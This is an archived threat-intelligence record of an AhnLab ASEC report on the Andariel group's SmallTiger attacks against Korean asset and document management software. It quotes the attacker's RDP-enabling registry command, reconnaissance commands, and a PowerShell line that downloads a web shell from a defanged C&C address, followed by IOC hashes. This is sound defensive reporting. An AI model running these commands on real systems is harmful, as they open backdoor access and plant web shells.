{
	"id": "2e2f0792-f67c-4808-849d-499957e11fce",
	"created_at": "2026-04-06T00:13:49.877504Z",
	"updated_at": "2026-04-10T03:34:54.423216Z",
	"deleted_at": null,
	"sha1_hash": "43471ddfed1ab83e9447d3566ecdfb694204ff68",
	"title": "Analysis of Attack Cases Against Korean Solutions by the Andariel Group (SmallTiger) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1670703,
	"plain_text": "Analysis of Attack Cases Against Korean Solutions by the Andariel\r\nGroup (SmallTiger) - ASEC\r\nBy ATCP\r\nPublished: 2024-12-22 · Archived: 2026-04-05 18:46:46 UTC\r\nThe Andariel group has been attacking various software used by South Korean companies since the past [1]. Notably, these\r\ninclude asset management solutions and data loss prevention (DLP) solutions, and vulnerability attack cases have also been\r\nidentified in various other solutions. \r\nAttack cases by the Andariel group are continuing in the second half of 2024, primarily installing SmallTiger. [2] A major\r\nexample of software targeted for exploitation is Korean asset management solutions that have been exploited for years, and\r\nthere are also indications of exploitation involving a document centralization solution.\r\n1. Attack Cases on Korean Asset Management Solutions\r\nAsset management solutions are continuously exploited in attacks, and due to their nature, it is presumed that after the\r\ncontrol server is compromised, the threat actor exploits it to execute malware installation commands. In most of these attack\r\ncases, ModeLoader was installed.\r\nAdditionally, there has been a case where control was seized through brute force and dictionary attacks on exposed update\r\nservers. In this case, the threat actor replaced the update program with SmallTiger, attempting to distribute SmallTiger across\r\nthe systems within the organization through this process.\r\nIn the recently identified case, the method of initial access or specific distribution method has not been found, but\r\nSmallTiger was installed in the installation path of the asset management solution, and a keylogger was used alongside it.\r\nThe keylogger is unique in that it stores the user’s keystrokes in the “MsMpLog.tmp” file in the same path.\r\nFigure 1. Keylogging data\r\nThe threat actor configured the system to allow future RDP access to the infected system using SmallTiger. The following\r\ncommand used to activate RDP was executed through SmallTiger. Additionally, an open-source tool called\r\nCreateHiddenAccount was installed to add and conceal a backdoor account.\r\nhttps://asec.ahnlab.com/en/85400/\r\nPage 1 of 4\n\n\u003e reg  add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v\r\nfDenyTSConnections /t REG_DWORD /d 0 /f\r\nFigure 2. RDP activation command executed through SmallTiger\r\n2. Attack Cases on Document Management Solution\r\nRecently, there have been indications of attacks targeting a Korean document management solution. The Apache Tomcat\r\nweb servers used by this solution are all outdated versions, and it is presumed that the threat actor targets locations where the\r\nlatest updates have not been applied.\r\nFigure 3. Compromised web server with Korean document management solution installed\r\nAfter initial access, the threat actor queried basic system information, and there is also a record of Advanced Port Scanner\r\nbeing installed.\r\n\u003e ping   20.20.100.32\r\n\u003e tasklist\r\n\u003e ipconfig  /all\r\n\u003e netstat  -noa\r\n\u003e whoami\r\nIt is presumed that subsequently, a web shell is installed using the following PowerShell command. Currently, downloading\r\nis not possible, but the download server “45.61.148[.]153” is also identified as the C\u0026C server address for SmallTiger in the\r\nhttps://asec.ahnlab.com/en/85400/\r\nPage 2 of 4\n\naforementioned attack case.\r\npowershell.exe  (New-Object\r\nSystem.Net.WebClient).DownloadFile(‘hxxp://45.61.148[.]153/pizza.jsp’,’C:\\*********\\web\\*********\\threadstate.jsp’\r\n3. Conclusion\r\nASEC has recently confirmed that the Andariel group is resuming their attacks using SmallTiger. The group has been\r\nexploiting various Korean solutions or attacking vulnerabilities to install malware since the past. The recently identified\r\nattack cases involve the ongoing exploitation of asset management solutions and newly identified indications of attacks\r\nagainst a Korean document management solution.\r\nCorporate security managers should strengthen the monitoring of centralized management solutions like asset management\r\nsolutions or document management solutions, and apply patches if there are any security vulnerabilities in the programs.\r\nThey should also apply the latest patch for OS and programs such as internet browsers and update V3 to the latest version to\r\nprevent malware infection in advance.\r\nMD5\r\n3525a8a16ce8988885d435133b3e85d8\r\n45ef2e621f4c530437e186914c7a9c62\r\n6a58b52b184715583cda792b56a0a1ed\r\nb500a8ffd4907a1dfda985683f1de1df\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//45[.]61[.]148[.]153/pizza[.]jsp\r\nAdditional IOCs are available on AhnLab TIP.\r\nIP\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner\r\nbelow.\r\nhttps://asec.ahnlab.com/en/85400/\r\nPage 3 of 4\n\nSource: https://asec.ahnlab.com/en/85400/\r\nhttps://asec.ahnlab.com/en/85400/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/85400/"
	],
	"report_names": [
		"85400"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434429,
	"ts_updated_at": 1775792094,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/43471ddfed1ab83e9447d3566ecdfb694204ff68.pdf",
		"text": "https://archive.orkl.eu/43471ddfed1ab83e9447d3566ecdfb694204ff68.txt",
		"img": "https://archive.orkl.eu/43471ddfed1ab83e9447d3566ecdfb694204ff68.jpg"
	}
}